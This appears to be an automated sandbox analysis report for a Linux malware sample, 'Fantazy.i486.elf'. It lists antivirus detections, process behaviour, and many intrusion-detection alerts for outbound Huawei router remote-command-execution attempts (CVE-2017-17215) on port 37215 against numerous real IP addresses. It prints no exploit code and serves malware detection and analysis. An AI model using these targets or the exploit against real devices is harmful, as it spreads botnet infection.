      2025-02-12T16:58:06.891499+010028352221A Network Trojan was detected192.168.2.2348694157.88.130.18637215TCP
      2025-02-12T16:58:06.891547+010028352221A Network Trojan was detected192.168.2.2348078157.22.75.25237215TCP
      2025-02-12T16:58:06.891658+010028352221A Network Trojan was detected192.168.2.2356510197.234.246.537215TCP
      2025-02-12T16:58:06.891821+010028352221A Network Trojan was detected192.168.2.2340786157.180.86.13937215TCP
      2025-02-12T16:58:06.891821+010028352221A Network Trojan was detected192.168.2.234318653.196.50.1737215TCP
      2025-02-12T16:58:06.891986+010028352221A Network Trojan was detected192.168.2.234596617.24.93.4637215TCP
      2025-02-12T16:58:06.892367+010028352221A Network Trojan was detected192.168.2.2340530197.56.80.5237215TCP
      2025-02-12T16:58:06.892380+010028352221A Network Trojan was detected192.168.2.235396441.160.40.537215TCP
      2025-02-12T16:58:06.892433+010028352221A Network Trojan was detected192.168.2.234664041.58.174.15437215TCP
      2025-02-12T16:58:06.892930+010028352221A Network Trojan was detected192.168.2.2349096157.123.6.15537215TCP
      2025-02-12T16:58:06.893228+010028352221A Network Trojan was detected192.168.2.2354624157.254.83.7037215TCP
      2025-02-12T16:58:06.906308+010028352221A Network Trojan was detected192.168.2.2347800157.235.81.13337215TCP
      2025-02-12T16:58:06.906368+010028352221A Network Trojan was detected192.168.2.234442241.1.142.18137215TCP
      2025-02-12T16:58:06.906426+010028352221A Network Trojan was detected192.168.2.233893241.54.47.22137215TCP
      2025-02-12T16:58:06.906543+010028352221A Network Trojan was detected192.168.2.233933241.96.54.23037215TCP
      2025-02-12T16:58:06.906626+010028352221A Network Trojan was detected192.168.2.2348130123.150.62.9937215TCP
      2025-02-12T16:58:06.906747+010028352221A Network Trojan was detected192.168.2.2354772197.168.247.20137215TCP
      2025-02-12T16:58:06.906772+010028352221A Network Trojan was detected192.168.2.2352616156.31.21.17737215TCP
      2025-02-12T16:58:06.906948+010028352221A Network Trojan was detected192.168.2.234607641.101.72.18137215TCP
      2025-02-12T16:58:06.907009+010028352221A Network Trojan was detected192.168.2.2349230199.89.4.037215TCP
      2025-02-12T16:58:06.907429+010028352221A Network Trojan was detected192.168.2.2355318157.122.88.15537215TCP
      2025-02-12T16:58:06.907973+010028352221A Network Trojan was detected192.168.2.2360922157.180.99.16837215TCP
      2025-02-12T16:58:06.908335+010028352221A Network Trojan was detected192.168.2.234083241.240.136.12337215TCP
      2025-02-12T16:58:06.908352+010028352221A Network Trojan was detected192.168.2.2353126157.34.31.5637215TCP
      2025-02-12T16:58:06.908395+010028352221A Network Trojan was detected192.168.2.234563441.179.67.2237215TCP
      2025-02-12T16:58:06.908648+010028352221A Network Trojan was detected192.168.2.2349662157.0.184.10837215TCP
      2025-02-12T16:58:06.908721+010028352221A Network Trojan was detected192.168.2.233564041.75.122.4437215TCP
      2025-02-12T16:58:06.908855+010028352221A Network Trojan was detected192.168.2.2339880157.159.161.14337215TCP
      2025-02-12T16:58:06.909985+010028352221A Network Trojan was detected192.168.2.233667227.22.242.22137215TCP
      2025-02-12T16:58:06.922439+010028352221A Network Trojan was detected192.168.2.2348402157.225.55.6037215TCP
      2025-02-12T16:58:06.922509+010028352221A Network Trojan was detected192.168.2.234213841.120.100.25337215TCP
      2025-02-12T16:58:06.922519+010028352221A Network Trojan was detected192.168.2.2351012222.146.92.10937215TCP
      2025-02-12T16:58:06.922586+010028352221A Network Trojan was detected192.168.2.2348092197.30.2.14037215TCP
      2025-02-12T16:58:06.922595+010028352221A Network Trojan was detected192.168.2.2354866210.16.172.5137215TCP
      2025-02-12T16:58:06.922595+010028352221A Network Trojan was detected192.168.2.2347028197.245.56.18337215TCP
      2025-02-12T16:58:06.922922+010028352221A Network Trojan was detected192.168.2.235647241.37.179.1937215TCP
      2025-02-12T16:58:06.922991+010028352221A Network Trojan was detected192.168.2.2334640157.50.36.24537215TCP
      2025-02-12T16:58:06.923130+010028352221A Network Trojan was detected192.168.2.2344674197.252.163.10337215TCP
      2025-02-12T16:58:06.923153+010028352221A Network Trojan was detected192.168.2.2347134179.50.84.19537215TCP
      2025-02-12T16:58:06.923153+010028352221A Network Trojan was detected192.168.2.23426104.94.130.7737215TCP
      2025-02-12T16:58:06.923242+010028352221A Network Trojan was detected192.168.2.2334232157.35.123.18037215TCP
      2025-02-12T16:58:06.923242+010028352221A Network Trojan was detected192.168.2.2347232204.73.122.24237215TCP
      2025-02-12T16:58:06.923326+010028352221A Network Trojan was detected192.168.2.23549388.38.139.12337215TCP
      2025-02-12T16:58:06.923630+010028352221A Network Trojan was detected192.168.2.2338266140.255.237.22537215TCP
      2025-02-12T16:58:06.923657+010028352221A Network Trojan was detected192.168.2.2336314190.255.181.2537215TCP
      2025-02-12T16:58:06.923715+010028352221A Network Trojan was detected192.168.2.2339128157.23.172.437215TCP
      2025-02-12T16:58:06.923789+010028352221A Network Trojan was detected192.168.2.234677441.160.145.20937215TCP
      2025-02-12T16:58:06.923903+010028352221A Network Trojan was detected192.168.2.2358050197.24.78.5337215TCP
      2025-02-12T16:58:06.924016+010028352221A Network Trojan was detected192.168.2.2348540157.248.32.18937215TCP
      2025-02-12T16:58:06.924120+010028352221A Network Trojan was detected192.168.2.2352446197.25.14.20737215TCP
      2025-02-12T16:58:06.924408+010028352221A Network Trojan was detected192.168.2.2349462197.33.140.23937215TCP
      2025-02-12T16:58:06.924472+010028352221A Network Trojan was detected192.168.2.2354836157.192.25.11937215TCP
      2025-02-12T16:58:06.924799+010028352221A Network Trojan was detected192.168.2.235903041.249.240.10637215TCP
      2025-02-12T16:58:06.925185+010028352221A Network Trojan was detected192.168.2.234044843.96.152.1737215TCP
      2025-02-12T16:58:06.925601+010028352221A Network Trojan was detected192.168.2.2350676157.230.248.2737215TCP
      2025-02-12T16:58:06.925669+010028352221A Network Trojan was detected192.168.2.2341422157.169.183.16637215TCP
      2025-02-12T16:58:06.925774+010028352221A Network Trojan was detected192.168.2.2344882197.157.130.24137215TCP
      2025-02-12T16:58:06.926117+010028352221A Network Trojan was detected192.168.2.2360922157.226.195.10737215TCP
      2025-02-12T16:58:06.926200+010028352221A Network Trojan was detected192.168.2.2337136103.184.52.8437215TCP
      2025-02-12T16:58:06.926585+010028352221A Network Trojan was detected192.168.2.2352182189.107.65.8237215TCP
      2025-02-12T16:58:06.926765+010028352221A Network Trojan was detected192.168.2.233772641.125.213.23937215TCP
      2025-02-12T16:58:06.926828+010028352221A Network Trojan was detected192.168.2.2359778157.245.179.22237215TCP
      2025-02-12T16:58:06.926872+010028352221A Network Trojan was detected192.168.2.2333372153.199.189.7937215TCP
      2025-02-12T16:58:06.926964+010028352221A Network Trojan was detected192.168.2.2351832157.21.141.20137215TCP
      2025-02-12T16:58:06.927042+010028352221A Network Trojan was detected192.168.2.2352794197.137.51.837215TCP
      2025-02-12T16:58:06.927265+010028352221A Network Trojan was detected192.168.2.234413641.138.53.23137215TCP
      2025-02-12T16:58:06.927266+010028352221A Network Trojan was detected192.168.2.2347716157.31.57.13237215TCP
      2025-02-12T16:58:06.927271+010028352221A Network Trojan was detected192.168.2.2337192197.246.164.6837215TCP
      2025-02-12T16:58:06.927404+010028352221A Network Trojan was detected192.168.2.234654441.36.142.3537215TCP
      2025-02-12T16:58:06.927428+010028352221A Network Trojan was detected192.168.2.233480641.32.83.7337215TCP
      2025-02-12T16:58:06.927442+010028352221A Network Trojan was detected192.168.2.2340402197.3.82.16037215TCP
      2025-02-12T16:58:06.927511+010028352221A Network Trojan was detected192.168.2.2341644197.106.86.23637215TCP
      2025-02-12T16:58:06.927731+010028352221A Network Trojan was detected192.168.2.2345258197.74.142.7937215TCP
      2025-02-12T16:58:06.927775+010028352221A Network Trojan was detected192.168.2.2338782130.242.60.23837215TCP
      2025-02-12T16:58:06.927776+010028352221A Network Trojan was detected192.168.2.2343962197.125.244.16637215TCP
      2025-02-12T16:58:06.927894+010028352221A Network Trojan was detected192.168.2.2337682157.250.205.24037215TCP
      2025-02-12T16:58:06.928009+010028352221A Network Trojan was detected192.168.2.233331841.105.6.13137215TCP
      2025-02-12T16:58:06.928061+010028352221A Network Trojan was detected192.168.2.2339038197.13.2.20437215TCP
      2025-02-12T16:58:06.928421+010028352221A Network Trojan was detected192.168.2.2348708197.189.116.4737215TCP
      2025-02-12T16:58:06.928922+010028352221A Network Trojan was detected192.168.2.2359132137.75.115.4837215TCP
      2025-02-12T16:58:06.929294+010028352221A Network Trojan was detected192.168.2.2360634157.197.81.18337215TCP
      2025-02-12T16:58:06.937550+010028352221A Network Trojan was detected192.168.2.2349778157.244.142.11737215TCP
      2025-02-12T16:58:06.941254+010028352221A Network Trojan was detected192.168.2.235058641.27.225.8537215TCP
      2025-02-12T16:58:06.941257+010028352221A Network Trojan was detected192.168.2.2343602157.166.137.9337215TCP
      2025-02-12T16:58:06.941420+010028352221A Network Trojan was detected192.168.2.2355722197.133.126.19237215TCP
      2025-02-12T16:58:06.941433+010028352221A Network Trojan was detected192.168.2.234328641.135.28.5737215TCP
      2025-02-12T16:58:06.941538+010028352221A Network Trojan was detected192.168.2.2349882157.135.83.4437215TCP
      2025-02-12T16:58:06.943071+010028352221A Network Trojan was detected192.168.2.235711241.192.216.2137215TCP
      2025-02-12T16:58:06.943116+010028352221A Network Trojan was detected192.168.2.235930641.242.167.23637215TCP
      2025-02-12T16:58:07.921907+010028352221A Network Trojan was detected192.168.2.2341588162.169.7.3137215TCP
      2025-02-12T16:58:07.922055+010028352221A Network Trojan was detected192.168.2.2358998119.170.127.6837215TCP
      2025-02-12T16:58:07.922130+010028352221A Network Trojan was detected192.168.2.2339484142.0.98.11537215TCP
      2025-02-12T16:58:07.922326+010028352221A Network Trojan was detected192.168.2.2346904197.243.92.8237215TCP
      2025-02-12T16:58:07.922409+010028352221A Network Trojan was detected192.168.2.234801672.59.139.16437215TCP
      2025-02-12T16:58:07.922584+010028352221A Network Trojan was detected192.168.2.2351228157.30.28.17837215TCP
      2025-02-12T16:58:07.922674+010028352221A Network Trojan was detected192.168.2.2357450197.226.98.11837215TCP
      2025-02-12T16:58:07.922808+010028352221A Network Trojan was detected192.168.2.2355424157.119.216.22537215TCP
      2025-02-12T16:58:07.922919+010028352221A Network Trojan was detected192.168.2.2358556197.239.249.11137215TCP
      2025-02-12T16:58:07.924180+010028352221A Network Trojan was detected192.168.2.2356680197.117.170.18837215TCP
      2025-02-12T16:58:07.924290+010028352221A Network Trojan was detected192.168.2.2341782157.127.185.21537215TCP
      2025-02-12T16:58:07.925786+010028352221A Network Trojan was detected192.168.2.2352746157.253.7.13237215TCP
      2025-02-12T16:58:07.937597+010028352221A Network Trojan was detected192.168.2.2351044197.3.46.21037215TCP
      2025-02-12T16:58:07.937633+010028352221A Network Trojan was detected192.168.2.234775441.74.20.14337215TCP
      2025-02-12T16:58:07.937683+010028352221A Network Trojan was detected192.168.2.2343626150.64.213.8137215TCP
      2025-02-12T16:58:07.937775+010028352221A Network Trojan was detected192.168.2.2333180157.35.203.19637215TCP
      2025-02-12T16:58:07.937873+010028352221A Network Trojan was detected192.168.2.2340446197.92.100.5937215TCP
      2025-02-12T16:58:07.938021+010028352221A Network Trojan was detected192.168.2.2334058157.29.72.11537215TCP
      2025-02-12T16:58:07.939797+010028352221A Network Trojan was detected192.168.2.2343702157.26.217.11137215TCP
      2025-02-12T16:58:07.939851+010028352221A Network Trojan was detected192.168.2.2337120197.139.69.19337215TCP
      2025-02-12T16:58:07.941508+010028352221A Network Trojan was detected192.168.2.234487641.110.222.9537215TCP
      2025-02-12T16:58:07.941623+010028352221A Network Trojan was detected192.168.2.234231241.34.254.25437215TCP
      2025-02-12T16:58:07.943536+010028352221A Network Trojan was detected192.168.2.2341964157.216.135.20437215TCP
      2025-02-12T16:58:07.955014+010028352221A Network Trojan was detected192.168.2.235582641.15.66.21237215TCP
      2025-02-12T16:58:07.955230+010028352221A Network Trojan was detected192.168.2.2356612131.217.21.9037215TCP
      2025-02-12T16:58:07.955238+010028352221A Network Trojan was detected192.168.2.2360710157.191.198.23337215TCP
      2025-02-12T16:58:07.957197+010028352221A Network Trojan was detected192.168.2.2339602157.250.101.21737215TCP
      2025-02-12T16:58:07.959098+010028352221A Network Trojan was detected192.168.2.2335012197.152.147.23737215TCP
      2025-02-12T16:58:09.922706+010028352221A Network Trojan was detected192.168.2.235497441.162.201.4837215TCP
      2025-02-12T16:58:09.938301+010028352221A Network Trojan was detected192.168.2.2356168157.20.179.20237215TCP
      2025-02-12T16:58:09.939253+010028352221A Network Trojan was detected192.168.2.236094241.121.226.537215TCP
      2025-02-12T16:58:09.939414+010028352221A Network Trojan was detected192.168.2.235542067.184.144.10737215TCP
      2025-02-12T16:58:09.940700+010028352221A Network Trojan was detected192.168.2.2334304157.81.215.14737215TCP
      2025-02-12T16:58:09.940911+010028352221A Network Trojan was detected192.168.2.234562841.104.77.18337215TCP
      2025-02-12T16:58:09.941368+010028352221A Network Trojan was detected192.168.2.233857251.110.163.17037215TCP
      2025-02-12T16:58:09.941492+010028352221A Network Trojan was detected192.168.2.2339000197.18.84.16437215TCP
      2025-02-12T16:58:09.984508+010028352221A Network Trojan was detected192.168.2.2337914157.229.11.6637215TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Fantazy.i486.elfAvira: detected
      Source: Fantazy.i486.elfReversingLabs: Detection: 48%
      Source: /usr/bin/pulseaudio (PID: 6306)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 6411)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 6580)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pulseaudio (PID: 6760)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 6799)Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: /usr/bin/pulseaudio (PID: 6866)Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: /usr/bin/pulseaudio (PID: 6960)Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: /usr/bin/pkill (PID: 6989)Reads CPU info from /sys: /sys/devices/system/cpu/online
      Source: /usr/bin/pulseaudio (PID: 7067)Reads CPU info from /sys: /sys/devices/system/cpu/online

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35216 -> 41.251.145.45:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57264 -> 193.111.52.71:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37320 -> 41.136.24.191:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38808 -> 197.6.20.117:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53128 -> 156.224.230.5:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34336 -> 41.246.130.243:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33390 -> 137.82.121.78:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56332 -> 196.73.182.43:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37746 -> 41.60.239.50:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47756 -> 157.190.149.199:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36036 -> 197.141.157.80:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33450 -> 197.51.43.80:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56976 -> 157.28.40.198:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53300 -> 157.34.117.25:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35680 -> 197.129.42.137:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59726 -> 197.83.110.34:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55834 -> 118.249.101.169:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52486 -> 181.83.194.184:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46186 -> 197.118.5.108:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59702 -> 157.30.250.76:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50546 -> 157.82.183.12:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42800 -> 197.131.64.247:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36210 -> 197.1.4.199:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47832 -> 157.120.192.239:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48676 -> 57.27.69.249:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53358 -> 41.136.218.101:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59966 -> 41.72.63.213:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59598 -> 41.88.117.78:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39922 -> 197.11.67.129:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43384 -> 19.78.162.5:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53850 -> 143.71.206.242:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35270 -> 157.193.56.121:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53980 -> 41.232.165.51:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57172 -> 41.114.175.109:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45094 -> 197.36.230.88:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41236 -> 41.15.241.242:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34552 -> 41.174.224.69:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40024 -> 197.121.150.228:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48548 -> 157.149.185.86:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52364 -> 197.244.239.131:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35494 -> 142.45.24.133:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41260 -> 41.65.107.128:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52732 -> 168.53.71.52:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52068 -> 197.2.17.212:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38078 -> 197.224.44.51:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57242 -> 41.219.90.55:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34190 -> 201.51.99.179:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33656 -> 157.90.234.244:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58628 -> 41.240.196.192:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58228 -> 197.35.94.109:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36096 -> 197.92.181.103:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57514 -> 136.126.146.116:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58170 -> 41.161.194.85:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56012 -> 222.152.153.198:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35302 -> 157.45.7.174:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51132 -> 197.170.133.38:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36326 -> 41.234.212.55:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46422 -> 208.188.25.183:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48236 -> 41.184.90.97:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51996 -> 8.81.85.227:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58798 -> 197.79.89.152:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49366 -> 32.10.203.115:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53420 -> 41.227.147.132:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39380 -> 80.120.167.73:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33316 -> 179.95.38.49:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56384 -> 41.76.250.140:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43826 -> 197.119.171.199:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60782 -> 157.6.128.12:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37604 -> 157.120.56.221:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34256 -> 157.164.116.53:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:32846 -> 157.86.35.90:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43966 -> 119.125.161.168:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51796 -> 220.227.26.180:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37188 -> 141.38.129.46:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43570 -> 157.36.136.81:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36188 -> 41.32.235.184:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50376 -> 157.147.20.199:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60906 -> 41.128.25.192:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40614 -> 197.123.16.80:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55872 -> 128.34.60.131:37215
